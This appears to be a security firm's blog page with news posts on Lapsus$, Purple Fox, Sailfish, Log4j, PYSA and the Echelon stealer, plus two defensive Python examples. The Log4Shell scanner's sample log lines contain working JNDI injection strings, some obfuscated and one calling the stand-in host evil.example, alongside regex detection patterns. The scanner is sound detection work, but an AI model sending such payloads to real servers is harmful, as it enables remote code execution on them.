Airzero Sec

We Do Not Give Up ! Trust US !

With the arrival of 2022, ransomware operators are back in business. Barely a week into the new year, researchers issued a notification about the newly discovered Lapsus$ ransomware group.

What's the latest?

  • During the New Year's holiday, Impresa, Portugal's largest media conglomerate, was hit by the new Lapsus$ ransomware.
  • The gang claimed responsibility by defacing all of Impresa's websites with a ransom note.
  • The attack did not, however, affect radio or cable television broadcasts.
  • While the company has regained control of many of the affected sites, the gang claims it still has access to company resources.

The overall picture

  • The Lapsus$ group has hacked several other organizations since it was first observed in December 2021.
  • Its victims include the websites of Brazil's Ministry of Health, an attack that resulted in the loss of COVID-19 vaccination data for millions of citizens.
  • Claro and Embratel, two South American telecommunications companies, were two further victims.

In conclusion

For cybercriminals, ransomware is a lucrative business: it works, and it pays. With each passing year, threat actors become more creative in their extortion and propagation techniques, posing a significant threat to organizations. Rather than remaining a sitting duck, organizations must strengthen their security posture with a robust backup process (backups kept offline or immutable and regularly test-restored, since ransomware operators routinely target any backups they can reach) and with detection for malicious activity.

Airzero Sec is leading the way in innovation to help you overcome your most difficult security challenges. If you have any questions about the newly discovered Lapsus$ ransomware and its targets, please contact us.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

Trojanized installers for the Telegram messaging app are being used to distribute the Windows-based Purple Fox backdoor on infected PCs.

According to recent research from Minerva Labs, the attack differs from other intrusions, which typically abuse a single piece of legitimate software to deliver their malicious payloads.

"This threat actor was able to leave most parts of the attack under the radar by separating the attack into several small files, most of which had very low detection rates by [antivirus] engines, with the final stage leading to Purple Fox rootkit infection," said researcher Natalie Zargarov.

Purple Fox was first identified in 2018 and has rootkit capabilities that let it evade detection by planting itself beyond the reach of security solutions. In a March 2021 study, Guardicore described its worm-like propagation, which lets the backdoor spread faster.

Then, in October 2021, Trend Micro researchers uncovered FoxSocket, a .NET implant used alongside Purple Fox that talks to its command-and-control (C2) servers over WebSockets for a more secure method of communication.

"Purple Fox stays on affected systems longer and delivers additional payloads," the researchers concluded.

Finally, in December 2021, Trend Micro detailed the later stages of the Purple Fox infection chain, which target SQL Server databases by loading a malicious SQL common language runtime (CLR) module for a more persistent and stealthier foothold, and eventually abuse the SQL servers for illicit cryptocurrency mining.

Minerva identified a new attack chain that starts with a Telegram installer file: a compiled AutoIt script that drops a legitimate Telegram installer alongside a malicious downloader named "TextInputh.exe," which fetches the next-stage malware from the C2 server.

The downloaded files then terminate antivirus engine processes before the final stage, which downloads and executes the Purple Fox rootkit from a remote server that has since gone offline.

"We found a large number of malicious installers delivering the same Purple Fox rootkit version using the same attack chain," Zargarov added. "The beauty of this attack is that every stage is separated into a different file, which is useless without the entire file set."

Every business faces daunting challenges when it comes to protecting its assets:

  • Threats that are new and evolving

  • Regulations governing privacy and compliance

  • The increased risk associated with digital transformation

With hundreds of point-solution vendors and cheap, inadequate tools, companies face a cyber security dilemma that can only be solved by a truly integrated cyber defense.

Airzero Sec is driving innovation to assist you in overcoming your most difficult challenges. If you have any questions about the fake Telegram messenger app, contact us at the email below.

Email:[email protected]


A team of researchers from the University of California, Santa Barbara, has demonstrated a "scalable technique" for vetting smart contracts and mitigating state-inconsistency bugs, uncovering 47 zero-day vulnerabilities on the Ethereum blockchain in the process.

Smart contracts are programs that are stored on the blockchain and are automatically executed when predetermined conditions are met based on the agreement's encoded terms. They enable anonymous parties to carry out trusted transactions and agreements without the need for a central authority.

In other words, the code is intended to be the final arbiter of "the deal" that it represents, with the program controlling all aspects of execution and providing an immutable evidentiary audit trail of transactions that are both trackable and irreversible.

This also implies that vulnerabilities in the code could result in significant losses, as evidenced by hacks against the DAO and, more recently, MonoX, in which adversaries exploited loopholes to illicitly syphon funds, a scenario that could have disastrous consequences given the burgeoning adoption of smart contracts in recent years.

"Because smart contracts are not easily upgradeable, auditing the contract's source prior to deployment and deploying a bug-free contract is even more important than in the case of traditional software," the researchers wrote in a paper.

Enter Sailfish, a tool that aims to detect state-inconsistency vulnerabilities in smart contracts: flaws that let an attacker tamper with the order in which transactions execute, or take over control flow within a single transaction (i.e., reentrancy).

The tool works as follows. Given a smart contract, Sailfish converts it into a storage dependency graph that captures the control- and data-flow relations between storage variables and the contract's state-changing instructions. It then uses the graph to identify potential flaws by defining "hazardous access" as a graph query: do two different execution paths, at least one of which performs a write, operate on the same storage variable?
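To make the hazardous-access query concrete, here is an added example (not Sailfish's code, which works on the contract's real control- and data-flow) that models each public function as one straight-line path of storage reads, storage writes and external calls, builds the storage dependency graph, and runs the query over it. The two contracts, VULNERABLE and FIXED, are constructed for the example, and the refinement that flags a path with an external call before a write as a reentrancy candidate is a simplification of the single-transaction case added here, not the paper's exact rule.

```python
"""A toy version of the hazardous-access query described above.

Each public function is modelled as one straight-line execution path of
(op, storage_var) steps, where op is 'read', 'write' or 'call' (an external
call, var None). Real Sailfish reasons about the compiled contract's control-
and data-flow; this model is an assumption made for the example.
"""
from collections import defaultdict
from itertools import combinations

# Constructed contract: a vault whose withdraw() sends Ether before it
# updates the balance (the pattern exploited against the DAO).
VULNERABLE = {
    "deposit":   [("read", "balances"), ("write", "balances")],
    "withdraw":  [("read", "balances"), ("call", None), ("write", "balances")],
    "balanceOf": [("read", "balances")],
}

# Same contract with withdraw() following checks-effects-interactions:
# the balance is written before control leaves the contract.
FIXED = dict(VULNERABLE, withdraw=[("read", "balances"), ("write", "balances"), ("call", None)])


def storage_graph(contract):
    """Storage dependency graph: storage var -> [(function, step, op), ...]."""
    graph = defaultdict(list)
    for fn, path in contract.items():
        for step, (op, var) in enumerate(path):
            if var is not None:
                graph[var].append((fn, step, op))
    return graph


def hazardous_accesses(contract):
    """Graph query: two different paths touch the same storage variable and at
    least one of them writes it. Returns {(var, (fn_a, fn_b)), ...}."""
    hazards = set()
    for var, accesses in storage_graph(contract).items():
        for (fa, _, op_a), (fb, _, op_b) in combinations(accesses, 2):
            if fa != fb and "write" in (op_a, op_b):
                hazards.add((var, tuple(sorted((fa, fb)))))
    return hazards


def call_before_write(path, var):
    """True if an external call happens before `var` is written on this path,
    i.e. a re-entrant caller can observe and act on the stale value."""
    control_left = False
    for op, v in path:
        if op == "call":
            control_left = True
        elif op == "write" and v == var and control_left:
            return True
    return False


def reentrancy_candidates(contract):
    """Hazardous pairs narrowed to paths that hand control away before the
    write, which is the single-transaction (reentrancy) flavour of the bug."""
    found = set()
    for var, pair in hazardous_accesses(contract):
        for fn in pair:
            if call_before_write(contract[fn], var):
                found.add((var, fn))
    return found


if __name__ == "__main__":
    print("hazardous pairs:", sorted(hazardous_accesses(VULNERABLE)))
    print("reentrancy candidates (vulnerable):", reentrancy_candidates(VULNERABLE))
    print("reentrancy candidates (fixed):", reentrancy_candidates(FIXED))
```

Both contracts produce the same three hazardous pairs, because the query by itself only says "these paths share state and one of them writes it". That is deliberately over-approximate; it is the follow-up check on where the external call sits relative to the write that separates the vulnerable withdraw() from the fixed one, and a real tool would then try to confirm exploitability before reporting.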

The researchers tested Sailfish on 89,853 contracts obtained from Etherscan, discovering 47 zero-day vulnerabilities that could be exploited to drain Ether and even corrupt application-specific metadata.

This includes a vulnerable contract implementing a housing tracker that could be abused so that a homeowner ends up with multiple active listings. The findings will be presented at the IEEE Symposium on Security and Privacy (S&P) in May 2022.

This is not the first time that academics have been drawn to problematic smart contracts. In September 2020, Chinese researchers created a framework for categorizing known vulnerabilities in smart contracts, with the goal of providing a detection criterion for each bug.

Airzero Sec's cybersecurity experts have worked on a wide range of projects for a number of well-known companies over many years. Use our experience to your advantage, whether to help you get there or to perform technical tests. If you have any doubts about the issue above, please do not hesitate to get in touch with us.

Email:[email protected]


Microsoft has warned of continued attempts by nation-state adversaries and commodity attackers to exploit the vulnerabilities in the Log4j open-source logging library to deploy malware on vulnerable systems.

"Exploitation attempts and testing have remained high during the last weeks of December," the Microsoft Threat Intelligence Center (MSTIC) said in revised guidance published earlier this week. "We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks."

The Apache Software Foundation formally disclosed the remote code execution (RCE) vulnerability in Apache Log4j 2, CVE-2021-44228, dubbed Log4Shell, on December 10, 2021, and it has since become a favoured attack vector for a range of threat actors.

Four more vulnerabilities in the library were disclosed in the weeks that followed (CVE-2021-45046, CVE-2021-45105, CVE-2021-4104 and CVE-2021-44832), and opportunistic actors have used the flaws to keep persistent control over compromised machines and mount an evolving range of attacks, from cryptocurrency miners to ransomware. Note that the follow-up CVEs are narrower than Log4Shell: CVE-2021-45105 is a denial of service, CVE-2021-4104 affects only Log4j 1.x deployments that use JMSAppender, and CVE-2021-45046 and CVE-2021-44832 require non-default configurations, so upgrading to a fixed 2.x release remains the priority.

Even as mass scanning continues unabated, attackers are also working to evade string-matching detections by obfuscating the malicious HTTP requests. The request is crafted so that the string Log4j writes into the web request log contains a lookup that uses JNDI to connect back to the attacker-controlled site.
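As an added example (not Microsoft's or Apache's code), the following Python scanner shows why a plain substring match is not enough against the obfuscation just described: it resolves the lookup syntax attackers hide behind (lower:, upper:, and the ':-' default value of env:, sys: and the bare :: form) inside-out, then searches the normalized result for a JNDI lookup. The resolver is a deliberately small model of Log4j's lookup behaviour rather than its implementation, the IP addresses are from documentation ranges, and the access-log lines are constructed.

```python
"""Detect obfuscated Log4Shell probes in web-server access logs.

The resolver is a small model of Log4j's ${...} lookup syntax, limited to the
forms commonly used for evasion; it is not Log4j's code. Log lines below are
constructed for the example.
"""
import re

# One innermost ${...} (no nested ${ inside); lookups are resolved inside-out.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What the attacker needs Log4j to see once the noise is stripped away.
JNDI = re.compile(r"jndi:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)://", re.IGNORECASE)

SAMPLE_LINES = [  # constructed Apache-style access log lines
    '198.51.100.7 - - [10/Jan/2022:08:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.7 - - [10/Jan/2022:08:01:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}${::-d}${env:NaN:-i}:${lower:LDAP}://203.0.113.5:1389/a}"',
    '198.51.100.9 - - [10/Jan/2022:08:02:40 +0000] "GET /login HTTP/1.1" 404 0 "-" "${${::-j}ndi:rmi://evil.example/x}"',
    '192.0.2.44 - - [10/Jan/2022:08:03:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.45 - - [10/Jan/2022:08:03:05 +0000] "GET /api?q=${date:yyyy} HTTP/1.1" 200 64 "-" "curl/7.81.0"',
]


def _eval_lookup(body):
    """Resolve one lookup body the way the attacker relies on Log4j resolving it."""
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${env:NAME:-x}, ${sys:NAME:-x}, ${::-x}: an unknown key falls back to the default.
        return body.split(":-", 1)[1]
    return "${" + body + "}"   # unresolvable here (including jndi: itself): leave in place


def normalize(text, max_rounds=32):
    """Collapse nested lookups inside-out until nothing changes."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(lambda m: _eval_lookup(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def naive_match(line):
    """The substring check that the obfuscation is designed to defeat."""
    lowered = line.lower()
    return "jndi:ldap" in lowered or "jndi:rmi" in lowered


def scan(lines):
    """Return (original, normalized) for every line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((line, norm))
    return hits


if __name__ == "__main__":
    for raw, norm in scan(SAMPLE_LINES):
        print("naive match:", naive_match(raw), "| normalized UA:", norm.rsplit('"', 2)[1])
```

Of the three probes, the naive substring check only catches the first; the other two are caught after normalization, while the harmless ${date:yyyy} query string is left alone because it resolves to nothing JNDI-related. In practice the same normalization should be applied to every attacker-controlled field that ends up in application logs (User-Agent, X-Forwarded-For, query parameters, form fields), and the scanner is a detection aid, not a substitute for patching.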

Microsoft also noted the "rapid adoption of the vulnerability into existing botnets like Mirai, existing campaigns that were previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems." Additional remote access toolkits and reverse shells, including Meterpreter, Bladabindi (aka NjRAT), and HabitsRAT, have also been delivered via Log4Shell.

"Customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments," MSTIC warned. "Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance."

The news comes as the US Federal Trade Commission (FTC) issued a statement warning that it "intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future."

For many years, Airzero Sec's cybersecurity experts have worked on a variety of projects for a number of well-known companies. Take advantage of our experience, whether to help you get there or to undertake technical tests. If you have any doubt about the topic above, don't hesitate to contact us. Airzero Cloud will be your digital companion.

Email:[email protected]


PYSA has overtaken the Conti ransomware gang, finding success with attacks on the government sector.

PYSA, also known as Mespinoza, overtook Conti as the leading ransomware threat group in November, joining the ranks of LockBit, which has dominated the space since August.

According to NCC Group's November ransomware insights, PYSA increased its market share with a 50% increase in the number of targeted organizations, including a 400% increase in attacks against government-sector systems.

Double-Extortion and Beyond

PYSA frequently uses double extortion against its targets: it exfiltrates data before encrypting it, then threatens to publish the data if the victim does not pay the ransom.

In March the FBI issued a dedicated alert about PYSA's focus on the education sector, warning schools to watch for phishing lures and brute-force Remote Desktop Protocol (RDP) attacks as initial-access techniques.

Everest Changes Tactics to Sell Early Access

According to NCC Group, the Russian-language ransomware group Everest is taking its extortion tactics to the next level, threatening to sell off access to targeted systems if its demands are not met.

NCC Group says Everest would sometimes skip the ransom demand entirely and focus on selling access instead. Analysts are watching closely to see whether this sparks a trend among other groups.

"While ransomware-as-a-service has grown in popularity in the last year, this is an example of a group forgoing a ransom demand and instead offering access to IT infrastructure – but we may see copycat attacks in 2022 and beyond," the report said. According to NCC Group, the regions with the most attacks are North America and Europe.

Conti is making a comeback.

Meanwhile, the prevalence of the Russian-language Conti group fell by 9.1 percent. The group is expected to make up ground in December, however, having been reported as the first professional ransomware operator to develop a fully weaponized attack chain against the Log4Shell vulnerability.

According to a report from AdvIntel last week, Conti's advantage is its size: the organization "plays a unique role in today's threat landscape, owing to its size."

Airzero Sec's cybersecurity experts have been working on a variety of projects for a number of well-known organizations for many years. Use our experience to your advantage, whether to help you get there or to conduct technical tests. If you have any concerns about PYSA emerging as the leading ransomware actor, please contact us. Airzero Sec will be your companion.

Email:[email protected]


Attackers are spreading the Echelon info stealer, which steals credentials for cryptocurrency wallets and other user accounts, using the Telegram handle "Smokes Night," according to researchers.

The attackers are using Echelon to target Telegram users' crypto-wallets, attempting to swindle new or naïve members of a cryptocurrency discussion channel on the messaging network, the researchers say.

According to a report posted on Thursday, researchers from SafeGuard Cyber's Division Seven threat-analysis unit identified a sample of Echelon in a cryptocurrency-focused Telegram channel in October.

The malware used in the campaign is set up to steal credentials from a variety of messaging, browser, VPN and file-transfer applications, including Discord, Edge, FileZilla, OpenVPN, Outlook, and even Telegram itself, as well as from cryptocurrency wallets such as AtomicWallet, BitcoinCore, and ByteCoin.

The effort was a "spray and pray" operation, according to the report: "Based on the malware and the way in which it was released, SafeGuard Cyber believes it was not part of a coordinated campaign and was merely targeting new or inexperienced users of the channel."

Researchers determined that the attackers tried to spread Echelon on the channel using the handle "Smokes Night," although it is unclear how successful they were.

"The post seemed not to be a reaction to any of the surrounding posts in the channel," they stated.

Other users on the channel, they say, did not seem to notice anything strange or respond to the message. That does not mean the malware failed to reach users' devices, the researchers note.

"We did not observe anyone respond to 'Smokes Night' or complain about the file," they said, "but this does not rule out the possibility that channel members were infected."

Cybercriminals have taken advantage of Telegram's popularity and large attack surface by distributing malware on the platform via bots, rogue accounts, and other methods.

Malware Analysis

The Echelon credential stealer was delivered to the cryptocurrency channel in a .RAR file called "present).rar," which contained three files: "pass – 123.txt," a benign text document containing a password; "DotNetZip.dll," a benign class library and toolset for manipulating .ZIP files; and "Present.exe," the malicious executable for the Echelon credential stealer.

The .NET payload is obfuscated with the open-source ConfuserEx tool and carries two anti-debugging capabilities that immediately terminate the process if a debugger or other malware-analysis tool is detected.

Researchers were able to deobfuscate the code and look inside the Echelon sample sent to the Telegram channel's subscribers. They identified domain detection, which means the sample tries to steal data for every domain the victim has visited. The report includes a detailed list of the platforms the Echelon sample attempted to target.

Other features of the malware, according to the researchers, include computer fingerprinting and the ability to take a screenshot of the victim's workstation. The Echelon sample used in the campaign sends credentials, other stolen data, and screenshots back to a command-and-control server in a compressed .ZIP file.

According to the researchers, Windows Defender detects and removes the malicious Present.exe sample, flagging it as '#LowFI: HookwowLow,' which protects users running that antivirus from any potential Echelon damage.

For years, Airzero Sec's cyber security consulting experts have worked on a variety of projects for a number of well-known organizations. Use our experience to your advantage, whether to help you get there or to perform technical tests. If you have any doubts about Telegram being used to steal the passwords of Bitcoin wallets, please contact us. Airzero Sec will be your digital partner.

Email:[email protected]
